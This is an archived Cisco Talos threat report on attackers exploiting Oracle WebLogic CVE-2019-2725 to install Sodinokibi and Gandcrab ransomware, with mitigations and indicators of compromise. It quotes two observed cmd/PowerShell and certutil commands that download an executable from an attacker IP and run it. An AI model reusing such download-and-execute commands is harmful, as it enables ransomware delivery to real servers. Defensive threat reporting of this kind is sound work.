{
	"id": "1c1b76fd-240b-4af9-8f6e-8e4f27ea81f3",
	"created_at": "2026-04-06T00:11:27.815191Z",
	"updated_at": "2026-04-10T13:11:38.954881Z",
	"deleted_at": null,
	"sha1_hash": "63d2cd8623f17edbf9928031524266764d68b7f9",
	"title": "Sodinokibi ransomware exploits WebLogic Server vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 817074,
	"plain_text": "Sodinokibi ransomware exploits WebLogic Server vulnerability\r\nBy Cisco Talos\r\nPublished: 2019-04-30 · Archived: 2026-04-05 15:41:15 UTC\r\nTuesday, April 30, 2019 14:00\r\nBy Pierre Cadieux, Colin Grady, Jaeson Schultz and Matt Valites.\r\nAttackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of\r\nransomware called \"Sodinokibi.\" Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy\r\nbackups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal\r\npatch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with\r\nHTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of\r\n9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident\r\nResponse (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 1 of 8\n\nInitial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. This was\r\na trial to see whether the server was exploitable.\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 2 of 8\n\nApril 25, 2019 activity showing the initial activity preceding the ransomware deployment.\r\nOn April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the\r\nAsyncResponderService of the Oracle WebLogic Server.\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 3 of 8\n\nActivity from April 26. The attackers are downloading the Sodinokibi ransomware.\r\nHistorically, most varieties of ransomware have required some form of user interaction, such as a user opening an\r\nattachment to an email message, clicking on a malicious link, or running a piece of malware on the device. In this\r\ncase, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a\r\ncopy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The\r\n188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware\r\nattack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and\r\nappears to have been infected and repurposed by the attackers. The attackers were ultimately successful at\r\nencrypting a number of systems during this incident.\r\nCisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST\r\nrequest contained arguments to a cmd.exe instruction — a PowerShell command to download a file called\r\n\"radm.exe\" from host 188.166.74[.]218, then save that file locally and execute it.\r\ncmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe\u0026cmd.exe /c\r\n%TEMP%\\\\radm.exe\r\nIn addition to PowerShell, we also observed the attackers creatively passing the certutil utility to cmd to download\r\na file:\r\ncmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe\r\n%TEMP%/radm.exe\u0026cmd.exe /c %TEMP%\\\\radm.exe\r\nOnce detonated in Threat Grid, the sandbox identified this sample as potential ransomware.\r\nThe website VirusTotal successfully detected the same binary hash on 43 out of 71 different engines.\r\nBelow, we can see the malicious file \"untitled.exe\" using \"cmd.exe\" to execute the vssadmin.exe utility. This\r\naction is a common tactic of ransomware to prevent users from easily recovering their data. It attempts to delete\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 4 of 8\n\ndefault Windows backup mechanisms, otherwise known as \"shadow copies,\" to prevent recovery of the original\r\nfiles from these backups.\r\nThe ransom note, in this case, directs victims to either a .onion website on the Tor network or on the public web at\r\nthe domain decryptor[.]top, registered on March 31 this year. With Sodinokibi, each encrypted system sees a\r\ndistinct encrypted file extension. The ransom note filename also includes this extension as a prefix (ex. 88f2947s-HOW-TO-DECRYPT.txt).\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 5 of 8\n\nThe Gandcrab affiliate connection\r\nAfter finishing deploying Sodinokibi ransomware inside the victim's network, the attackers followed up with an\r\nadditional CVE-2019-2725 exploit attempt approximately eight hours later. However, this time, the attackers\r\nchose to distribute Gandcrab v5.2. We find it strange the attackers would choose to distribute additional, different\r\nransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their\r\nearlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\r\nConclusion\r\nThis attack is notable because of the attackers' use of a zero-day exploit to distribute ransomware. Whereas\r\npreviously we have witnessed ransomware attackers taking advantage of unpatched systems to install and laterally\r\npropagate ransomware, this zero-day exploitation method could work on otherwise fully-patched systems.\r\nThe victims in this ransomware attack were able to activate their Incident Response Retainer with Cisco IR\r\nServices, and they received immediate support and advice on managing the incident. Immediate actions taken\r\nlikely prevented a more significant outage.\r\nDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects\r\nwidespread attacks involving CVE-2019-2725, and we recommend the following actions. Any number of layered\r\ncontrols could prevent or otherwise deter this type of attack, including:\r\nPatch WebLogic as soon as possible against CVE-2019-2725.\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 6 of 8\n\nLog and centrally collect web, application, and operating systems events.\r\nRestrict the access of the account used to run the WebLogic process\r\nMonitor for signs of compromise:\r\nEgress network communications from data center systems.\r\nRansomware \"Canary\" files.\r\nExternal HTTP POSTs to new URIs.\r\nWeb shells.\r\nUnexpected activity of service/system accounts (WebLogic user).\r\nScan for, understand, and mitigate your vulnerability posture.\r\nRestrict egress Data Center communications.\r\nSegment the network for defense and monitoring.\r\nControl URL access (in this case external access to \"/_async/*\" and \"/wls-wsat/*\").\r\nPlan for Disaster Recovery, including maintaining and testing data backups and recovery.\r\nConfigure PowerShell to execute only signed scripts.\r\nIndicators of Compromise (IoC)\r\nRansomware samples:\r\n0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d\r\n34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160\r\n74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac\r\n95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05\r\nfa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451\r\nDistribution URLs:\r\nhxxp://188.166.74[.]218/office.exe\r\nhxxp://188.166.74[.]218/radm.exe\r\nhxxp://188.166.74[.]218/untitled.exe\r\nhxxp://45.55.211[.]79/.cache/untitled.exe\r\nAttacker IP:\r\n130.61.54[.]136\r\nAttacker Domain:\r\ndecryptor[.]top\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 7 of 8\n\nSource: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html"
	],
	"report_names": [
		"sodinokibi-ransomware-exploits-weblogic.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434287,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63d2cd8623f17edbf9928031524266764d68b7f9.pdf",
		"text": "https://archive.orkl.eu/63d2cd8623f17edbf9928031524266764d68b7f9.txt",
		"img": "https://archive.orkl.eu/63d2cd8623f17edbf9928031524266764d68b7f9.jpg"
	}
}